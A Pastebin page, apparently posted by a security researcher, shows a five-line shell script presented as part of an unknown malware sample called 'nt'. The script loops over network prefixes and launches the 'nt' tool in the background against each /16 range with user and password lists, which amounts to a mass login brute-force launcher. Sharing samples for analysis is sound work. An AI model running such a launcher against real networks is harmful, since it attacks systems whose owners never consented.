Advertisement
CaffeineSecurity

New unknown malware "nt" - included file "s"

Jul 18th, 2012
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.11 KB | None | 0 0
  1. #!/bin/sh
  2. LIST=$1
  3. for i in $LIST; do
  4.     ./nt -h $i.0.0/16 -u users -p pass -t 6 -c 20 -o log -d -k -C &
  5. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement